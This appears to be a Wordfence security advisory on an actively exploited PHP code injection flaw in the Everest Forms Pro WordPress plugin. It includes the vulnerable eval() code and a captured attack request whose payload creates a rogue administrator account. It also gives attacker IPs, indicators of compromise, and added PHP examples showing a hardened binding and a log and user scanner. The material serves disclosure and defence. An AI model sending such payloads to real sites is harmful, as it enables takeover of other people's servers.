Severity: CRITICAL | Category: Attacks | Source: Wordfence

Attackers Actively Exploiting Critical Vulnerability in Everest Forms Pro Plugin

A critical unauthenticated remote code execution vulnerability (CVE-2026-3300, CVSS 9.8) in the Everest Forms Pro WordPress plugin allows attackers to inject arbitrary PHP code via crafted form submissions when the "Complex Calculation" feature is used, due to improper input sanitization before an `eval()` call. The NVD data indicates the vulnerability affects versions up to and including 1.9.12, and the vendor has released a patched version, 1.9.13. As this flaw is under active exploitation, administrators must immediately update to version 1.9.13.

On March 30th, 2026, we publicly disclosed a critical Remote Code Execution vulnerability in Everest Forms Pro, a WordPress plugin with an estimated 4,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to execute arbitrary PHP code on the server, leading to complete site compromise. The vendor released the fully patched version on March 18th, 2026. Our records indicate that attackers started exploiting the issue on April 13th, 2026. The Wordfence Firewall has already blocked over 29,300 exploit attempts targeting this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026.

Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of Everest Forms Pro, version 1.9.13 at the time of this writing, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field

CVSS Rating: 9.8 (Critical)
CVE-ID: CVE-2026-3300
Affected Version(s): <= 1.9.12
Patched Version: 1.9.13
Bounty: $325.00
Affected Software: Everest Forms Pro [everest-forms-pro]
Researcher: h0xilo

The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to the input does not escape single quotes or other characters that are significant in a PHP code context.
This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.

Vulnerability Details

Examining the code reveals that the plugin uses the process_filter() function in the EverestForms\Pro\Addons\Calculation\Process\Process class to evaluate user-defined calculation formulas. The function concatenates submitted form field values into a PHP code string, which is then passed to the eval() function, as shown in the following code snippet:

    // Calculate Complex calculation.
    if ( isset( $field['php_code'] ) && isset( $field['js_code'] ) && ! empty( $field['php_code'] ) && ! empty( $field['js_code'] ) ) {
        $php_code       = $field['php_code'];
        $field_variable = array();
        foreach ( $form_data['form_fields'] as $field_id => $form_field_data ) {
            $field_id_arr = explode( '-', $field_id );
            $var_name     = '$FIELD_' . $field_id_arr[1];
            $field_type   = $form_field_data['type'];
            $field_value  = ! empty( $entry['form_fields'][ $field_id ] ) ? $entry['form_fields'][ $field_id ] : 0;
            $excludeField = array(
                'credit-card',
                'square-payment',
                'authorize-net',
                'textarea',
                'privacy-policy',
                'signature',
                'address',
                'phone',
                'date-time',
                'wysiwyg',
                'color',
                'country',
                'yes-no',
                'likert',
                'yes-no',
                'image-upload',
                'file-upload',
                'scale-rating',
            );
            if ( in_array( $field_type, $excludeField ) ) {
                continue;
            }
            if ( ! is_array( $field_value ) ) {
                $field_value = trim( preg_replace( '/\$/', '', $field_value ) );
                switch ( $field_type ) {
                    case 'text':
                    case 'select':
                    case 'url':
                    case 'email':
                    case 'first-name':
                    case 'last-name':
                    case 'name':
                    case 'radio':
                        if ( is_numeric( $field_value ) ) {
                            $field_variable[] = "$var_name = $field_value";
                        } else {
                            $field_variable[] = "$var_name = '$field_value'";
                        }
                        break;
                    case 'payment-multiple':
                        $field_value = ! empty( $form_field_data['choices'][ $field_value ]['value'] ) ? $form_field_data['choices'][ $field_value ]['value'] : 0;
                        if ( is_numeric( $field_value ) ) {
                            $field_variable[] = "$var_name = $field_value";
                        } else {
                            $field_variable[] = "$var_name = '$field_value'";
                        }
                        break;
                    default:
                        if ( is_numeric( $field_value ) ) {
                            $field_variable[] = "$var_name = $field_value";
                        } else {
                            $field_variable[] = "$var_name = '$field_value'";
                        }
                        break;
                }
            } else {
                switch ( $field_type ) {
                    case 'payment-checkbox':
                        $field_value = ! empty( $form_fields[ $field_id ]['value']['amount'] ) ? $form_fields[ $field_id ]['value']['amount'] : 0;
                        if ( is_numeric( $field_value ) ) {
                            $field_variable[] = "$var_name = $field_value";
                        } else {
                            $field_variable[] = "$var_name = '$field_value'";
                        }
                        break;
                    default:
                        break;
                }
            }
        }
        $final_field_variables = implode( ";\n", $field_variable );
        $return_var            = Transpiler::RESULT_VAR_NAME;
        ${Transpiler::FUNCTIONS_ARRAY_NAME}       = $this->functions;
        ${Transpiler::INNER_FUNCTIONS_ARRAY_NAME} = $this->inner_functions;
        $php_code = preg_replace( '/\<\?php/', "$final_field_variables; $" . '_RETURN = 0;', $php_code . 'return $' . $return_var . ';' );
        try {
            $total = eval( $php_code );

Although user input is sanitized with sanitize_text_field(), this function does not escape single quotes or other characters that are significant in PHP code. For string-based fields (such as text, email, select, and radio fields), the submitted value is placed inside single quotes and directly added to a PHP code string. An unauthenticated attacker can exploit this by submitting a value containing a single quote, followed by malicious PHP code and a comment character, allowing them to break out of the string and inject PHP code that is later executed through the eval() function. This makes it possible for unauthenticated attackers to execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field, as long as the targeted form uses the "Complex Calculation" feature.
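To make the escaping problem concrete, here is an added example that is not the plugin's code and not from Wordfence: it rebuilds the variable-binding step in isolation. The functions bind_unsafe(), bind_safe() and evaluate_formula() and the sample submission are constructed for this illustration. The unsafe binder reproduces the advisory's pattern (raw value between single quotes), the hardened binder emits values as var_export() literals so quotes and backslashes are escaped, and the final evaluation shows that a submitted value shaped like the breakout stays an ordinary string.

```php
<?php
// Added example, not code from the Everest Forms Pro plugin or from Wordfence.
// It contrasts the advisory's pattern (raw value interpolated into a single-quoted
// PHP literal) with a binding that cannot be broken out of, and evaluates only the
// hardened code string to show the submitted text remains data.

declare(strict_types=1);

// Constructed sample submission. FIELD_2 has the shape the advisory describes:
// a closing quote, a statement, and a trailing comment marker.
$submitted = array(
    'FIELD_1' => '12.5',
    'FIELD_2' => "'; echo 'INJECTED'; //",
    'FIELD_3' => "O'Brien",
);

// The vulnerable pattern: the value is dropped between two single quotes as-is.
// sanitize_text_field() leaves every character of FIELD_2 intact, so the
// generated source gains an extra statement. This string is never evaluated here.
function bind_unsafe( array $vars ): string {
    $lines = array();
    foreach ( $vars as $name => $value ) {
        $lines[] = is_numeric( $value ) ? "\$$name = $value" : "\$$name = '$value'";
    }
    return implode( ";\n", $lines ) . ";\n";
}

// Hardened binding: var_export() emits a PHP literal with quotes and backslashes
// escaped, so the submitted text can only ever be a string value. The variable
// name is validated too, because it also ends up inside the generated source.
function bind_safe( array $vars ): string {
    $lines = array();
    foreach ( $vars as $name => $value ) {
        if ( ! preg_match( '/^[A-Za-z_][A-Za-z0-9_]*$/', $name ) ) {
            throw new InvalidArgumentException( "Refusing unsafe variable name: $name" );
        }
        $literal = is_numeric( $value ) ? var_export( (float) $value, true ) : var_export( (string) $value, true );
        $lines[] = "\$$name = $literal";
    }
    return implode( ";\n", $lines ) . ";\n";
}

// Evaluates a calculation formula against safely bound values. This still calls
// eval(): the hardened binding removes the string breakout, but executing generated
// source stays a design risk, so a formula evaluator that never builds PHP code is
// the better end state.
function evaluate_formula( string $formula, array $vars ) {
    return eval( bind_safe( $vars ) . $formula );
}

echo "Generated by the vulnerable pattern:\n", bind_unsafe( $submitted ), "\n";
// Second line reads:  $FIELD_2 = ''; echo 'INJECTED'; //'

echo "Generated by the hardened pattern:\n", bind_safe( $submitted ), "\n";
// Second line reads:  $FIELD_2 = '\'; echo \'INJECTED\'; //'

$result = evaluate_formula( 'return $FIELD_1 * 2;', $submitted );
echo "Formula result: $result\n";
// Prints 25, and nothing prints "INJECTED": FIELD_2 was bound as a plain string.
```

Run it with the PHP CLI (php example.php). The var_export() step is the minimal escaping fix for the string-context issue the advisory describes; the installed fix is still to update to 1.9.13, and any redesign should prefer evaluating formulas over a value array rather than generating PHP source from form submissions.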
As with all remote code execution vulnerabilities, this can lead to complete site compromise through the creation of administrator accounts, the use of webshells, and other techniques.

A Closer Look at the Attack Data

The following data highlights actual exploit attempts from threat actors targeting this vulnerability.

Example attack request

The most common payload observed in our blocked requests attempts to create a new administrator account named "diksimarina" on the affected site.

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: [redacted]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded

    everest_forms[id]=2909&everest_forms[form_fields][svbtwqPN9R-2]=';if(!username_exists('diksimarina')){wp_insert_user(array('user_login'=>'diksimarina','user_pass'=>'[redacted]','user_email'=>'diksimarina@gmail.com','role'=>'administrator'));echo 'ADMINCREATED';}else{echo 'ADMINEXISTS';} //&everest_forms[form_fields][eluWudCcdM-1]=test&everest_forms[form_fields][email]=test&everest_forms[form_fields][rVuWSql19Q-3]=test&everest_forms[form_fields][rwkAbDLqrq-7]=test&everest_forms[form_fields][LKLn7arQDU-5]=test&action=everest_forms_ajax_form_submission&security=cd840335ff

In the request above, the attacker submits a value for a text field that begins with a single quote to close the wrapping string literal, followed by a PHP statement that calls wp_insert_user() to create a new administrator account with the username "diksimarina". The trailing // comment marker ensures the rest of the generated PHP code, including the closing quote, is treated as a comment and does not cause a syntax error. When the form is processed and the calculation is evaluated, the injected PHP code is executed and the malicious administrator account is created.
Once authenticated as the new administrator, the attacker can fully compromise the site by uploading webshells, modifying themes or plugins, or installing further backdoors for persistent access.

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Total Number of Exploits Blocked

The Wordfence Firewall has blocked over 29,300 exploit attempts since the vulnerability was publicly disclosed. According to our data, attackers started targeting websites on April 13th, 2026. We also detected and blocked a large number of exploit attempts on May 16th, 2026, when over 17,900 exploit attempts were blocked in a single day.

Top Offending IP Addresses

The following IP addresses are currently the most actively engaged in targeting the Everest Forms Pro Complex Calculation feature:

202.56.2.126: over 26,300 blocked requests.
209.146.60.26: over 2,600 blocked requests.
15.235.166.18: over 250 blocked requests.
2402:1f00:8000:800::40db: over 80 blocked requests.
185.78.165.153: over 10 blocked requests.

Indicators of Compromise

The attackers are attempting to create new administrator accounts on affected sites. It is recommended to review the list of WordPress users on your site. In particular, look for an administrator account with the username "diksimarina" or the email address "diksimarina@gmail.com", which has been the most commonly observed payload in attacks targeting this vulnerability.
We also recommend reviewing log files for any requests originating from the following IP addresses:

202.56.2.126
209.146.60.26
15.235.166.18
2402:1f00:8000:800::40db
185.78.165.153

Conclusion

In today's article, we covered the attack data for a critical-severity Remote Code Execution vulnerability in the Everest Forms Pro plugin that allows unauthenticated threat actors to execute arbitrary PHP code and achieve complete site compromise. Our threat intelligence indicates that attackers started actively targeting this vulnerability on April 13th, 2026, with mass exploitation occurring on May 16th, 2026. The Wordfence firewall has already blocked over 29,300 exploit attempts targeting this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on February 27, 2026. Sites using the free version of Wordfence received the same protection 30 days later on March 29, 2026. Even if you have already received a firewall rule for this issue, we urge you to ensure that your site is updated to the latest version, 1.9.13, in order to maintain normal functionality.

If you have friends or colleagues using Everest Forms Pro, be sure to forward this advisory to them, as sites could still be unprotected and unpatched.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post Attackers Actively Exploiting Critical Vulnerability in Everest Forms Pro Plugin appeared first on Wordfence.
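The Indicators of Compromise section above recommends two checks: reviewing the WordPress user list for the observed account, and reviewing logs for the listed source addresses. The following is an added example of both checks as a small PHP CLI script; it is not Wordfence tooling and not part of the advisory. The function names, the Apache combined log format, the sample users and the sample log lines are all constructed assumptions; the username, email address and IP addresses are the ones the advisory lists. It also flags POSTs to admin-ajax.php from any address, since the exploit arrives as an AJAX form submission whose body is not in an access log, so those entries are the ones to correlate with form-submission records.

```php
<?php
// Added example, not Wordfence's tooling. Checks the two indicators named in the
// advisory: (1) a user matching the observed username or email, and (2) access-log
// requests from the listed source addresses. admin-ajax.php POSTs from any address
// are flagged separately for follow-up because request bodies are not logged.
// Function names and the Apache combined log format are assumptions.

declare(strict_types=1);

// Indicators taken from the advisory.
const IOC_USERNAME = 'diksimarina';
const IOC_EMAIL    = 'diksimarina@gmail.com';
const IOC_IPS      = array(
    '202.56.2.126',
    '209.146.60.26',
    '15.235.166.18',
    '2402:1f00:8000:800::40db',
    '185.78.165.153',
);

// Checks rows shaped like wp_users (user_login, user_email). On a live site these
// rows would come from get_users() or a direct query; here they are passed in.
function find_ioc_users( array $users ): array {
    $hits = array();
    foreach ( $users as $user ) {
        if ( strcasecmp( $user['user_login'], IOC_USERNAME ) === 0
            || strcasecmp( $user['user_email'], IOC_EMAIL ) === 0 ) {
            $hits[] = $user;
        }
    }
    return $hits;
}

// Parses one Apache combined-format line into client IP, timestamp, method, path, status.
function parse_log_line( string $line ): ?array {
    if ( ! preg_match( '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/', $line, $m ) ) {
        return null;
    }
    return array( 'ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4], 'status' => (int) $m[5] );
}

// Flags requests from the advisory's IPs, plus any POST to admin-ajax.php.
function scan_access_log( array $lines ): array {
    $findings = array();
    foreach ( $lines as $line ) {
        $req = parse_log_line( $line );
        if ( $req === null ) {
            continue; // unparseable line, skip rather than guess
        }
        $known_ip  = in_array( $req['ip'], IOC_IPS, true );
        $ajax_post = $req['method'] === 'POST' && strpos( $req['path'], '/wp-admin/admin-ajax.php' ) === 0;
        if ( $known_ip || $ajax_post ) {
            $findings[] = array(
                'ip'     => $req['ip'],
                'time'   => $req['time'],
                'path'   => $req['path'],
                'reason' => $known_ip ? 'listed source IP' : 'admin-ajax POST, correlate with form submissions',
            );
        }
    }
    return $findings;
}

// Constructed sample data (not real site data).
$users = array(
    array( 'user_login' => 'editor1',     'user_email' => 'editor@example.test' ),
    array( 'user_login' => 'diksimarina', 'user_email' => 'someone@example.test' ),
);
$log = array(
    '203.0.113.7 - - [16/May/2026:10:01:02 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '202.56.2.126 - - [16/May/2026:10:01:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/May/2026:10:02:41 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
);

foreach ( find_ioc_users( $users ) as $hit ) {
    echo "User IoC match: {$hit['user_login']} <{$hit['user_email']}>\n";
}
foreach ( scan_access_log( $log ) as $f ) {
    echo "{$f['time']} {$f['ip']} {$f['path']}: {$f['reason']}\n";
}
// With the sample data: one user match (diksimarina), and two flagged log lines
// (the listed IP, and the second admin-ajax POST); the GET /about/ line is ignored.
```

A user match on the username alone is treated as a hit even when the email differs, since the advisory names either value as the indicator. The admin-ajax flag is intentionally broad: legitimate WordPress traffic (the heartbeat in the third sample line) also POSTs there, so those findings are a correlation list for the form-submission records, not a verdict.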
